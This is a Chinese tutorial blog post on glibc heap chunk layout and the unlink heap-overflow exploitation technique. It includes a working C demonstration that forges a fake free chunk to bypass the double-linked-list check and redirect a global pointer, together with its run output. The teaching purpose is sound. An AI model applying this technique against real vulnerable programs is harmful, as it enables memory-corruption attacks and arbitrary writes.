堆块chunk介绍&堆溢出漏洞的unlink利用原理
堆块chunk介绍&堆溢出漏洞的unlink利用原理
chunk结构
当进程动态分配内存时,系统会在堆中创建一个chunk(堆块)。chunk包含chunk头和chunk体两部分
chunk头中有两个字段:
- prev_size:前一个chunk的size,前指的之前分配的内存,也就是低地址相邻的chunk
- size:当前chunk的size,size字段的低3位A,M,P不用于计算size,其中末位的PREV_INUSE字段表示前一堆块是否正在使用(1为使用,0为空闲)
chunk体分为两种情况
- 对于非空闲/正在使用的堆块,chunk体就是当前堆块存放的数据。
- 空闲的堆块会被一个双向链表(空闲链表)连接。chunk体的前两个size_t的空间存放两个指针fd和bk,fd指向链表中的前一个chunk(低地址),bk指向链表中的后一个chunk(高地址)。之后的空间是空闲的,即全0
chunk结构代码如下
struct chunk{ size_t prev_size; size_t size;//低3位为A,M,P union{ struct{ chunk* fd; chunk* bk; }; char userdata[n]; } }
chunk注意事项
- 在64位系统下,size_t为8字节
- 使用
size_t *p = (size_t*)malloc(0x80)
分配堆空间后返回的指针p指向的不是chunk的基址&chunk,而是&chunk+2*sizeof(size_t),即跳过了prev_size和size。所以实际上chunk的大小还要加上chunk头,为0x80+0x8*2=0x90
- 在编写代码时,往往无法获得chunk结构的对象,要想修改chunk的fd和bk的值,需要使用
*(&chunk+2*sizeof(size_t)) = value
和*(&chunk+3*sizeof(size_t)) = value
,或者使用chunk[2]和chunk[3]来修改 - 当PREV_INUSE=1时,prev_size无意义,一般填0即可
chunk的free过程
如果我们要free一个chunk,设其指针为p,free(p)会进行如下操作:
- 检查物理上与p前后相邻的chunk是否也是空闲的
- 如果是,则将空闲的chunk与p进行合并,将空闲的chunk从空闲链表中删除(unlink),将合并后的chunk加入空闲链表
如果free的chunk大小小于0x80,则会放入fastbin,不会进行合并操作
unlink(p)时,首先会进行一个检查
// fd bk if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \ malloc_printerr (check_action, "corrupted double-linked list", P, AV); \
然后执行四句代码完成删除
FD=p->fd; BK=p->bk; FD->bk=BK; BK->fd=FD;
堆溢出漏洞的unlink利用原理
由上面的介绍可知,free一个堆块时会在链表中unlink原来空闲的chunk,而unlink的四句代码可以被利用来进行非法操作,方法如下
首先需要堆中有连续的两个chunk_p和chunk_f(假设size均为0x90个字节),还需要可以控制指针p。然后在chunk_p中构造一个略小的fake_chunk,其基址=p,和chunk_p只差一个chunk头,fake_chunk大小为0x80。现在要将fake_chunk伪装成一个空闲的chunk,进行如下操作
- 通过堆溢出(0x80/8=16,所以是修改p[16]和p[17])设置f->prev_size=sizeof(fake_chunk), f->PREV_INUSE=0,这让系统认为f的前一个chunk是fake_chunk,并且是空闲的
- 设置fake_chunk->prev_size=0,fake_chunk->PREV_INUSE=1,这让系统认为fake_chunk前面的chunk不是空闲的。prev_size=0的原因参见注意事项(3)
- 设置
fake_chunk->fd=&p-3*sizeof(size_t)
,fake_chunk->bk=&p-2*sizeof(size_t)
,这是利用unlink的关键。这里&p是存放p这个指针的内存地址,也就是存放fake_chunk基址的地址
此时堆结构如下
现在,执行free(f)。系统先检查与f相邻的fake_chunk,发现是空闲的,所以要从链表中unlink(fake_chunk),四行代码会执行为:
FD=fake_chunk->fd;//FD=&p-3*sizeof(size_t) BK=fake_chunk->bk;//BK=&p-2*sizeof(size_t) FD->bk=BK;//*(&p-3*sizeof(size_t)+3*sizeof(size_t))=BK BK->fd=FD;//*(&p-2*sizeof(size_t)+2*sizeof(size_t))=FD
最后一行执行后会使得*(&p)=&p-3*sizeof(size_t)
,也就是说unlink使得p指针指向了&p-3*sizeof(size_t)
这个地址,一般来说这个地方是处于bss节的。这时候如果再向fake_chunk写入数据,程序就会访问到&p-3*sizeof(size_t),并向其中写入数据。
另外,之所以要在chunk_p中偏移两个size_t构造fake_chunk而不是直接将chunk_p改造为fake_chunk,是因为要绕过unlink(fake_chunk)(也就是unlink(&p))时的检查
// fd bk if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \ malloc_printerr (check_action, "corrupted double-linked list", P, AV); \
必须使得FD->bk==BK->fd==&p
,我们构造的fake_chunk会使得FD->bk=&p-3*sizeof(size_t)+3*sizeof(size_t)=&p
,成功绕过这个检查。
实验
该程序来自https://bbs.kanxue.com/thread-273402.htm
#include <stdio.h> size_t* a = NULL; size_t* b = NULL; size_t* c = NULL; size_t* p = NULL; size_t* f = NULL; int main() { p = malloc(0x80); f = malloc(0x80); malloc(0x10); //set f->PREV_INUSE = 0 p[17] = 0x90;//*(f-1) = 0x90; //set f->prev_size = 0x80(fakechunk size) p[16] = 0x80;//*(f-2) = 0x80; //fakechunk p[0] = 0; p[1] = 0x81; p[2] = &a; p[3] = &b; //unlink printf("&a = %p\n", &a); printf("&b = %p\n", &b); printf("&c = %p\n", &c); printf("&p = %p\n", &p); printf("&f = %p\n", &f); printf("p = %p\n", p); printf("f = %p\n", f); free(f); printf("p = %p\n", p); if(&a == p) { printf("hack!!!!\n"); p[0] = 0x11111111; p[1] = 0x22222222; p[2] = 0x33333333; p[3] = 0x44444444; printf("a = %p\n", a); printf("b = %p\n", b); printf("c = %p\n", c); printf("p = %p\n", p); } return 0; }
编译:gcc -g test.c -o test
IDA打开elf可以看到全局变量a,b,c,p,f的地址按顺序存放在ELF的.bss节,两两间隔sizeof(size_t)=8B。这样在设置fake_chunk的fd和bk时,直接赋值&a和&b即可。
使用gdb看一下构造完fake_chunk后的堆结构,f的PREV_INUSE已经置为0,说明fake_chunk空闲
fake_chunk和f修改如下
运行程序,可以看到free(f)后p指向的位置确实发生了变化,改变为了&a,之后成功通过p[0]~p[3]来修改该处的内存数据。
&a = 0x5561b7fde018 &b = 0x5561b7fde020 &c = 0x5561b7fde028 &p = 0x5561b7fde030 &f = 0x5561b7fde038 p = 0x5561b85ed010 f = 0x5561b85ed0a0 p = 0x5561b7fde018 hack!!!! a = 0x11111111 b = 0x22222222 c = 0x33333333 p = 0x44444444
最后要注意的是,该程序需要通过2.27以下的glibc运行(我用的是2.23),2.27以后的glibc会在free(f)时将fake_chunk放入bins中,导致无法与f合并,指针p也就没法改变了。glibc版本切换的方法参考我的文章https://www.cnblogs.com/nemuzuki/p/17290156.html
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 单线程的Redis速度为什么快?
· SQL Server 2025 AI相关能力初探
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 展开说说关于C#中ORM框架的用法!